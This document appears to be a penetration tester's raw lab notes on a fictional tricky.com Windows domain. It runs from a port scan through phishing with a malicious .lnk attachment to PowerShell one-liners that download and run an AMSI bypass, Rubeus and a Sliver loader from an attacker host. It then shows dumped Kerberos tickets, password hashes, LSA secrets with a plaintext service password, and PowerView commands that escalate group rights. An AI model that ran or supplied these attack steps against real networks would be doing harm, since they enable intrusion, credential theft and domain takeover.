IPs
-
172.16.181.150
-
192.168.181.100
-
192.168.181.159
-
172.16.181.151
-
172.16.181.152
-
172.16.181.155
In total 6 IP machine are there.
rustscan -a 192.168.181.100 192.168.181.169 --ulimit 5000 -- -Pn -sC -sV -oA challenge2192.168.181.100
192.168.181.159 (MAIL01.tricky.com)
PORT STATE SERVICE REASON VERSION
25/tcp open smtp syn-ack hMailServer smtpd
| smtp-commands: mail01.tricky.com, SIZE 20480000, AUTH LOGIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
80/tcp open http syn-ack Microsoft IIS httpd 10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Tricky.com Mail system information
110/tcp open pop3 syn-ack hMailServer pop3d
|_pop3-capabilities: UIDL TOP USER
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
143/tcp open imap syn-ack hMailServer imapd
|_imap-capabilities: NAMESPACE QUOTA CAPABILITY ACL CHILDREN OK SORT completed IDLE IMAP4rev1 RIGHTS=texkA0001 IMAP4
445/tcp open microsoft-ds? syn-ack
587/tcp open smtp syn-ack hMailServer smtpd
| smtp-commands: mail01.tricky.com, SIZE 20480000, AUTH LOGIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
3389/tcp open ms-wbt-server syn-ack Microsoft Terminal Services
|_ssl-date: 2024-03-20T02:26:38+00:00; +1m25s from scanner time.
| rdp-ntlm-info:
| Target_Name: TRICKY
| NetBIOS_Domain_Name: TRICKY
| NetBIOS_Computer_Name: MAIL01
| DNS_Domain_Name: tricky.com
| DNS_Computer_Name: mail01.tricky.com
| DNS_Tree_Name: tricky.com
| Product_Version: 10.0.17763
|_ System_Time: 2024-03-20T02:26:28+00:00
| ssl-cert: Subject: commonName=mail01.tricky.com
| Issuer: commonName=mail01.tricky.com
5985/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open msrpc syn-ack Microsoft Windows RPC
49665/tcp open msrpc syn-ack Microsoft Windows RPC
49666/tcp open msrpc syn-ack Microsoft Windows RPC
49667/tcp open msrpc syn-ack Microsoft Windows RPC
49668/tcp open msrpc syn-ack Microsoft Windows RPC
49669/tcp open msrpc syn-ack Microsoft Windows RPC
49670/tcp open msrpc syn-ack Microsoft Windows RPC
49671/tcp open msrpc syn-ack Microsoft Windows RPC
49672/tcp open msrpc syn-ack Microsoft Windows RPC
CLient Side Execution
swaks --to Will@tricky.com --from bad@motherfucker.com --server 192.168.181.159 --header "Subject: Test Email" --body "This is a test email." --attach /home/jay/osep/windows_10_test/x.exe.lnk
- AMSI SCRIPT FROM ZERO POINT
- Client Side execution
Had to do with simple shell
iex (new-object net.webclient).downloadstring("http://192.168.45.195/amsi"); iex (new-object net.webclient).downloadstring("http://192.168.45.195/rub.ps1");
Invoke-Rubeus -Command 'tgtdeleg /service:krbtgt /nowrap'
doIE3jCCBNqgAwIBBaEDAgEWooID7TCCA+lhggPlMIID4aADAgEFoQwbClRSSUNLWS5DT02iHzAdoAMCAQKhFjAUGwZrcmJ0Z3QbClRSSUNLWS5DT02jggOpMIIDpaADAgESoQMCAQKiggOXBIIDk7EBw2hA1pKv/VcMUCBu5KCnDthuZCwqKcnDZLGFJXhmmOc+kLLVWuI97bxOTygNSgXlvzPN3HcETPF3tWCPJUTnlaRDArfFjdxc1uzOBujA+EQUwOTcudU816UxB3sAvRZJKP6lh0hk9wNbTz6emHjZxApxo0QVgGf9VmyqY5TlzvPP7OdgftTgE2wNDFb5Z4dSr8CoqYt/nWXXqgubLaQR2qlXR/cD35Sm36cUaP/CZIP8kEOIc/LnfhEWLJOzz0g1VKg8gebLj+X6yy66xDYFbZ1pqGcQhAAIvSACEckDLm27W36kR5zLjdlu2bEQlpfl7MTnerosYtBMIv6MxYWvgXK4L4ye9N4vQ7R0giO/vzYSOlIWuru5gTOfeYauri8bPqnfinhNMWLPd7/A2U0yNMihvxgySb2kUcIdaff4EA+mGwQMNrXBLWdyksy6N+mStk9wSuL/uXomPEmImQgoJBYLUb3N66L3QtSmDnHelXa6ziEmnRGWYbaX8d8GLxgE/h0EtAWqBuoDZEqsU4iM+FrCrQjDmxRZ8A8wpjCI/6xJFIVxsKfMcf27qYlCZYOWzRcbkeb+izspzujGkm3oW0ayKtOAzIT1ziSpaJC93pP3INZjeE9HSwWHudIOjisQHWqDNaDSZkuwPDPjndXxvQUbghXdfY3ydY0BX6NzBfqhh9BXccm2O5McIoUipzlCBTJQRi7eEhFCdBKmCeLxmUkjhjv/zD5AZRfUz5FewdKqujDHI7vwI1BoPWQgzoemsuM2Imd0C4vwlNldmcERcIU/2z482VxR7YVDy0ipIkiWlpgB4LaAsGtS02bpdwzV1gNnRAvne6hlAQ33ZgjUws1bWoG9Kd/pJMocqer9EVeXhhvImil8sn/B2w0F7rt2swFK9WxemOWJ4AFHLLd8kbew6IoLK62LqeOOBwS2iEZW5w/JNWU4ikwGGwh9hXMf8UHAV72accw41lOnjcRW++cfa0WTp8Wu7Ghm6v4+dEX1XlTtQLnpAP05/ozdzipNPgEeRiOV3iy3TNxXyVk/ZJQFXr9DVSBKMz3o5qJQ+2nxrbj8R5ugXaV4cLGoZ1zqx/HrvpZ/92COF5asA6lTFe1qKIDeEAXdQjh4LXqy295qjsdkodBufFOML1sIYGAH637R2djCOnookDL7KMooBZItOq9BoEjoVkCvd7YEM65D0g+TBJa2mrhDFqL3cDelOaOB3DCB2aADAgEAooHRBIHOfYHLMIHIoIHFMIHCMIG/oCswKaADAgESoSIEIIKo/CAObt8Ye7tKtq68qZKOsYu84etF4DEsZITEUY8MoQwbClRSSUNLWS5DT02iETAPoAMCAQGhCDAGGwR3aWxsowcDBQBgoQAApREYDzIwMjQwMzIwMTIyMTIyWqYRGA8yMDI0MDMyMDIxNTMwOVqnERgPMjAyNDAzMjcxMTUzMDlaqAwbClRSSUNLWS5DT02pHzAdoAMCAQKhFjAUGwZrcmJ0Z3QbClRSSUNLWS5DT00=
./rubeustoccache.py doIE3jCCBNqgAwIBBaEDAgEWooID7TCCA+lhggPlMIID4aADAgEFoQwbClRSSUNLWS5DT02iHzAdoAMCAQKhFjAUGwZrcmJ0Z3QbClRSSUNLWS5DT02jggOpMIIDpaADAgESoQMCAQKiggOXBIIDk7EBw2hA1pKv/VcMUCBu5KCnDthuZCwqKcnDZLGFJXhmmOc+kLLVWuI97bxOTygNSgXlvzPN3HcETPF3tWCPJUTnlaRDArfFjdxc1uzOBujA+EQUwOTcudU816UxB3sAvRZJKP6lh0hk9wNbTz6emHjZxApxo0QVgGf9VmyqY5TlzvPP7OdgftTgE2wNDFb5Z4dSr8CoqYt/nWXXqgubLaQR2qlXR/cD35Sm36cUaP/CZIP8kEOIc/LnfhEWLJOzz0g1VKg8gebLj+X6yy66xDYFbZ1pqGcQhAAIvSACEckDLm27W36kR5zLjdlu2bEQlpfl7MTnerosYtBMIv6MxYWvgXK4L4ye9N4vQ7R0giO/vzYSOlIWuru5gTOfeYauri8bPqnfinhNMWLPd7/A2U0yNMihvxgySb2kUcIdaff4EA+mGwQMNrXBLWdyksy6N+mStk9wSuL/uXomPEmImQgoJBYLUb3N66L3QtSmDnHelXa6ziEmnRGWYbaX8d8GLxgE/h0EtAWqBuoDZEqsU4iM+FrCrQjDmxRZ8A8wpjCI/6xJFIVxsKfMcf27qYlCZYOWzRcbkeb+izspzujGkm3oW0ayKtOAzIT1ziSpaJC93pP3INZjeE9HSwWHudIOjisQHWqDNaDSZkuwPDPjndXxvQUbghXdfY3ydY0BX6NzBfqhh9BXccm2O5McIoUipzlCBTJQRi7eEhFCdBKmCeLxmUkjhjv/zD5AZRfUz5FewdKqujDHI7vwI1BoPWQgzoemsuM2Imd0C4vwlNldmcERcIU/2z482VxR7YVDy0ipIkiWlpgB4LaAsGtS02bpdwzV1gNnRAvne6hlAQ33ZgjUws1bWoG9Kd/pJMocqer9EVeXhhvImil8sn/B2w0F7rt2swFK9WxemOWJ4AFHLLd8kbew6IoLK62LqeOOBwS2iEZW5w/JNWU4ikwGGwh9hXMf8UHAV72accw41lOnjcRW++cfa0WTp8Wu7Ghm6v4+dEX1XlTtQLnpAP05/ozdzipNPgEeRiOV3iy3TNxXyVk/ZJQFXr9DVSBKMz3o5qJQ+2nxrbj8R5ugXaV4cLGoZ1zqx/HrvpZ/92COF5asA6lTFe1qKIDeEAXdQjh4LXqy295qjsdkodBufFOML1sIYGAH637R2djCOnookDL7KMooBZItOq9BoEjoVkCvd7YEM65D0g+TBJa2mrhDFqL3cDelOaOB3DCB2aADAgEAooHRBIHOfYHLMIHIoIHFMIHCMIG/oCswKaADAgESoSIEIIKo/CAObt8Ye7tKtq68qZKOsYu84etF4DEsZITEUY8MoQwbClRSSUNLWS5DT02iETAPoAMCAQGhCDAGGwR3aWxsowcDBQBgoQAApREYDzIwMjQwMzIwMTIyMTIyWqYRGA8yMDI0MDMyMDIxNTMwOVqnERgPMjAyNDAzMjcxMTUzMDlaqAwbClRSSUNLWS5DT02pHzAdoAMCAQKhFjAUGwZrcmJ0Z3QbClRSSUNLWS5DT00= will.kribi will.ccache
iex (new-object net.webclient).downloadstring("http://192.168.45.195/amsi"); (New-Object System.Net.WebClient).DownloadString('http://192.168.45.195:80/SliverPhollow64.txt') | IEX;
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe posh.csproj
$ExecutionContext.SessionState.LanguageMode
$krb5tgs$23$*sqlsvc$tricky.com$MSSQLSvc/sql07.tricky.com:1433@tricky.com*$783FCA2425D54268AF5F62E72A34661C$36F59B27126B8C4CDE39006A4BBC6D16DB1D127A0F1D8C1F6194FBCD0B21E5CFBC0F7DA90A1A0DD3C07084EB1CACC78A8081438647C94691272AFD214E1C668455B83B47BDB80AABB48D18C0D57AA8A83EAB6EE08D25E740A22575A7CD81942EF85B7777803829981290017279A5B94E725767CE149DEA047EF6C73432C26E399F2EDD9E9E8ED64A02614B2FE2EC19F018EA343E8716F9E5B692B1355728E06093B8150045BE8008DAC1982B8FDFF6254CEEAAE69A2E2FA945D79712413ABFA3A602627CB381B478C3403314D541459CF79D869D33485A61D133A696D321C33C78C139393D866812701D5BBE696FBB2EFFEE65BF9C8BC64545BE64BD7E6AE4229F9E1AAA717320C1991D519AD450A9D2BD63236EA10D476CE6B22C0BC830C2D00C7AB1818001C72EA48EA8C0062692C0DD4A70CF20250B07E7B733FD0BD0555B96791D5DAC4D1F50F5F4544CC4C424B3356631C748F9FDD46ABB872D7B5BB0AE554D37904A8E6198E6548DED4ED69C3F51D1B379DE6518097AAEC55A0776809EE29C53B5E558B2BD75533267CA98D335C2A224637C48CA2D06D3207F3711F4338811B4FF3A8ED2313AB2031163A638CD76F2EC3410E1524F83A21AB16D86D92A7662D91E39C51B678AEF32D9CE76EC6E40D9285B4B6C2A4E7581C9A1F2B09D5EAB2E6D4B40138D5CC4BBD557F4EBB153D80BDD1516C3E01825460858ADDB96AB12D8E64D5F2A371F5AE5BC6FC177CC1B615042E4A7700B9299525D9B72E1EE95B41BBBB349B2C40966A0480578A032E48986934DD021C09AEBE90BD02034DB3A5F1D94CF53773CA9D941317113EF854A7393BE752ED2CDC24FF2872D9E0A5002CF0C924F5FF8FACC5A48260CDC13A1631B219158B9D5E764EF301FD474C83488E7EE0E76526455161B78EBEF71356C83952D19AC71B5B19A62B6E9DBD81374D2C3D338B236337D938F873F0B08327769DF7D970CB06FB08CB278DB3B042B46D879B8F23DACBC2E2E394F1774705E213EDDC76C1D7797B9394F80D06DEA9AA19061C71A36F2428C50C748E41F632645CE3DC84B4C8BDBADFF1876E65BA731844C3C4BEBCCC4D45EE0C83CE1BF7EA44207CF3F12E7BF928BB72D4E607671912B9C3679CF992552F902DB5FEFB4F3C0D350CDBA66C79D1485408DC6DFA105640DA594A478D9FFC9059BF0530BB0B102AF60BD52FB1C146E2B710A0EDC5DEBD3720431BF29E67CDC6F67E517B2D6C0C720EE24C68A93899B048218571312B9629E510A9C907CE6CC8A6088B6F89F1BEEC2642F17EC1DB8A767F9C6DBDE3A2F7CD32BE0841A0868F9D70F144A77EE5E658758B5F5F5D827786C9F12C02BCED4A106B16B7EF42BACD91644EC7C36B1FBA65FA147AE118E9E3BC08861CB0D75A5EC7BA204
Administrator:500:aad3b435b51404eeaad3b435b51404ee:f263e421c6243b7fce36a145a5abd2c8
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:807e88817b41a28e6a46892728b03ce7
setup:1001:aad3b435b51404eeaad3b435b51404ee:85c14abd05f0e6107af13f55fddffdc3
[*] Cached domain logon information(domain/username:hash)
TRICKY.COM/Administrator:$DCC2$10240#Administrator#4b83a4ee0293e34203ec48a91fcb85af
TRICKY.COM/sqlsvc:$DCC2$10240#sqlsvc#c563b0d9b9e31f859baf10af22af0c62
[*] LSA Secrets
[*] $MACHINE.ACC
tricky.com\sql05$:aad3b435b51404eeaad3b435b51404ee:5ef8cb45f30726406d03d7cccaad3d17
[*] DPAPI_SYSTEM
dpapi_machinekey:07f5b837ebe9a982fc005f548146d3699cb436f3
dpapi_userkey:4d9a41c616478eb8729a95b416dd167b25fa964e
[*] NL$KM
NL$KM:c4b60d85beb8fdb70e205822acd2cd55439a37490a90dfe0e86846fea14e110207ee00a224c81ad41d1cede6fbd5e9f51f4bc6a90940ffc0a7fb1027fc74f1af
[*] _SC_MSSQL$SQLEXPRESS
sqlsvc@tricky.com:4dfgdfFFF542
---------------Script execution completed---------------
Add-DomainObjectAcl -TargetIdentity "MAILADMINS" -PrincipalIdentity sqlsvc -Domain tricky.com -Rights All -Verbose
Add-DomainGroupMember -Identity 'MAILADMINS' -Members 'sqlsvc'
Get-DomainGroupMember -Identity 'MAILADMINS'